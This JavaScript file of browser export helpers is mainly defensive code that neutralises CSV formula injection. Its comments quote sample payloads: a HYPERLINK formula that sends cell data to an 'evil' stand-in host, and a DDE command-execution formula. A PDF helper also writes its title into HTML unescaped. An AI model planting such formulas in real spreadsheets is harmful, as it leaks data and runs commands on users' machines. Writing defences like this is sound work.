// Copyright (c) 2026 Optimum Healthcare IT. All rights reserved.
// Author: Frank Scalzo <Optimum Healthcare IT>
// License: proprietary
// provenance-id: 8b38fea7-b1d4-4b27-a49e-0597b61ffa30

// Export helpers — CSV (inventory), PDF (print window), PNG (charts).
// Deliberately dependency-free so the build stays green; can later swap the
// PDF path for jsPDF/pdfmake if we want pixel-perfect server-side rendering.

// ---------------------------------------------------------------------------
// CSV cell escaping — quoting AND formula-injection neutralisation.
//
// Excel, Google Sheets and LibreOffice all treat a cell whose FIRST character is
// = + - @ (or a leading tab / CR, which those apps strip before parsing) as a
// FORMULA, not text. Primordia ingests client spreadsheets and exports them
// again, and those exports are opened without a second thought — so a value such
// as =HYPERLINK("http://evil/"&A1,"click") or =cmd|'/c calc'!A1 that arrived in a
// client's own inventory would be re-emitted by us and execute in THEIR
// spreadsheet. We would be the delivery mechanism.
//
// The neutralisation is a single leading apostrophe. That is the conventional,
// Excel- and Sheets-compatible fix: both treat a leading ' as "the rest of this
// cell is literal text" and do not display it. DO NOT "tidy" the apostrophe away
// — it is the whole defence, and without it the cell executes on open.
//
// Genuine numbers must survive as numbers, so a cell that is a well-formed
// number (-42, +3, -1.5e3) is exempt: it starts with a sign, not with an
// operator, and prefixing it would turn every negative figure in a cost model
// into text that will not sum. Anything else with a risky first character
// (-1+cmd|…, =SUM(...), @import) is prefixed and quoted.
// ---------------------------------------------------------------------------
const FORMULA_LEAD = /^[=+\-@\t\r]/;
// Optional sign, digits with optional decimal part, optional exponent.
const PLAIN_NUMBER = /^[+-]?(?:\d+(?:\.\d+)?|\.\d+)(?:[eE][+-]?\d+)?$/;
// \r as well as \n: a lone CR breaks row alignment if it is left unquoted.
const NEEDS_QUOTES = /[",\r\n]/;

function csvCell(v) {
  if (v === undefined || v === null) return '';
  const s = String(v);
  const neutralise = FORMULA_LEAD.test(s) && !PLAIN_NUMBER.test(s);
  const body = neutralise ? `'${s}` : s;
  // Neutralised cells are always quoted so the apostrophe cannot be re-parsed.
  return neutralise || NEEDS_QUOTES.test(body) ? `"${body.replace(/"/g, '""')}"` : body;
}

export function exportCsv(filename, rows, columns) {
  const header = columns.map((c) => csvCell(c.label)).join(',');
  const body = rows
    .map((r) => columns.map((c) => csvCell(typeof c.value === 'function' ? c.value(r) : r[c.value])).join(','))
    .join('\n');
  // Leading U+FEFF (UTF-8 BOM). Without it Excel decodes the file as the local
  // ANSI code page and mangles accented and non-Latin names.
  const blob = new Blob(['\uFEFF', `${header}\n${body}`], { type: 'text/csv;charset=utf-8;' });
  triggerDownload(blob, filename);
}

export function triggerDownload(blob, filename) {
  const url = URL.createObjectURL(blob);
  const a = document.createElement('a');
  a.href = url;
  a.download = filename;
  document.body.appendChild(a);
  a.click();
  document.body.removeChild(a);
  setTimeout(() => URL.revokeObjectURL(url), 1000);
}

// Print a DOM element to PDF via a clean print window (user picks "Save as PDF").
export function printElementToPdf(elementId, title) {
  const el = document.getElementById(elementId);
  if (!el) return;
  const w = window.open('', '_blank', 'width=900,height=1200');
  if (!w) return;
  w.document.write(`<!doctype html><html><head><title>${title}</title>
    <style>
      body{font-family:-apple-system,Segoe UI,Roboto,Arial,sans-serif;color:#222;margin:32px;}
      h1{font-size:20px;margin:0 0 4px;} h2{font-size:14px;color:#12325f;border-bottom:1px solid #ddd;padding-bottom:4px;margin-top:24px;}
      .row{display:flex;padding:3px 0;font-size:12px;} .lbl{width:240px;color:#666;} .val{flex:1;}
      .tag{display:inline-block;background:#eee;border-radius:10px;padding:1px 8px;margin:2px;font-size:11px;}
      @media print{ @page{ margin:14mm; } }
    </style></head><body>${el.innerHTML}</body></html>`);
  w.document.close();
  w.focus();
  setTimeout(() => { w.print(); }, 300);
}

// Download a <canvas>/chart as PNG.
export function exportCanvasPng(canvas, filename) {
  if (!canvas) return;
  canvas.toBlob((blob) => blob && triggerDownload(blob, filename));
}
